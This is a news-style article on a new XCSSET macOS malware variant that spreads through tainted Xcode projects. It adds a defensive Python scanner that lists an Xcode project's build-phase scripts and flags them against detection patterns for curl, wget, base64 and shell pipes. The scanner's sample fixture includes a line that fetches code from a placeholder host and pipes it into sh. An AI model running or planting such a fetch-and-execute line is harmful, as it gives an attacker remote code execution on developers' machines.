
According to Microsoft, the recent enhancements to this malware family expand its previously reported capabilities, which include targeting digital wallets, harvesting data from the Notes application, and extracting confidential system information and files. XCSSET comprises several modules designed to gather and transmit sensitive data from compromised devices.
The updated XCSSET variant is now detectable by Microsoft Defender for Endpoint on Mac, and it is anticipated that other malware detection solutions will soon follow suit. Unfortunately, Microsoft has not yet provided any file hashes or other indicators of compromise that users can utilize to determine if they have been affected. A representative from Microsoft indicated that these indicators will be shared in an upcoming blog entry.
To safeguard against new variants, Microsoft advises developers to thoroughly examine all Xcode projects that they download or clone from repositories, as sharing these projects is common practice among developers. XCSSET takes advantage of the inherent trust within the development community by spreading through malicious projects created by attackers.
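One way to start the project review Microsoft recommends is to list every script an Xcode project would run at build time, so each can be read before the project is opened or built. The sketch below is an added example, not code from Microsoft or this article. It assumes the scripts sit in `PBXShellScriptBuildPhase` and `PBXBuildRule` objects of `project.pbxproj`, and its review hints are generic prompts chosen for illustration, not published XCSSET indicators.

```python
import re

# Objects in project.pbxproj whose script text Xcode executes during a build.
OBJECT_RE = re.compile(
    r'(?P<id>\w+) /\* (?P<name>[^\n]*?) \*/ = \{\s*'
    r'isa = (?P<isa>PBXShellScriptBuildPhase|PBXBuildRule);(?P<body>.*?)\n\s*\};',
    re.S)
SCRIPT_RE = re.compile(r'\b(?:shellScript|script) = "(?P<src>(?:[^"\\]|\\.)*)";', re.S)

# Generic review prompts (assumptions for this example, not XCSSET indicators).
REVIEW_HINTS = {
    "fetches remote content": re.compile(r"\b(?:curl|wget)\b"),
    "decodes embedded data": re.compile(r"\b(?:base64|xxd)\b"),
    "pipes into a shell": re.compile(r"\|\s*(?:ba|z)?sh\b"),
    "runs AppleScript": re.compile(r"\bosascript\b"),
}

def unescape(text):
    """Undo pbxproj backslash escapes so the script reads as it was written."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m[1], m[1]), text, flags=re.S)

def build_scripts(pbxproj_text):
    """Return id, name, kind, source and review hints for each build-time script."""
    found = []
    for obj in OBJECT_RE.finditer(pbxproj_text):
        script = SCRIPT_RE.search(obj["body"])
        if script is None:
            continue  # e.g. a build rule that uses a compiler spec, not a script
        source = unescape(script["src"])
        hints = sorted(h for h, rx in REVIEW_HINTS.items() if rx.search(source))
        found.append({"id": obj["id"], "name": obj["name"], "kind": obj["isa"],
                      "source": source, "hints": hints})
    return found

# Constructed sample in pbxproj syntax; the IDs, names and URL are made up.
SAMPLE = r'''
    AA0000000000000000000001 /* Run SwiftLint */ = {
        isa = PBXShellScriptBuildPhase;
        shellScript = "if which swiftlint >/dev/null; then\n  swiftlint\nfi\n";
    };
    AA0000000000000000000002 /* ShellScript */ = {
        isa = PBXShellScriptBuildPhase;
        shellScript = "curl -s https://example.invalid/x | sh\n";
    };
'''

if __name__ == "__main__":
    for rec in build_scripts(SAMPLE):
        print(rec["kind"], rec["id"], rec["name"], rec["hints"])
```

To check a real project, pass the text of its `project.pbxproj` file to `build_scripts` and read every returned script; an empty hint list means only that none of the generic prompts matched.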
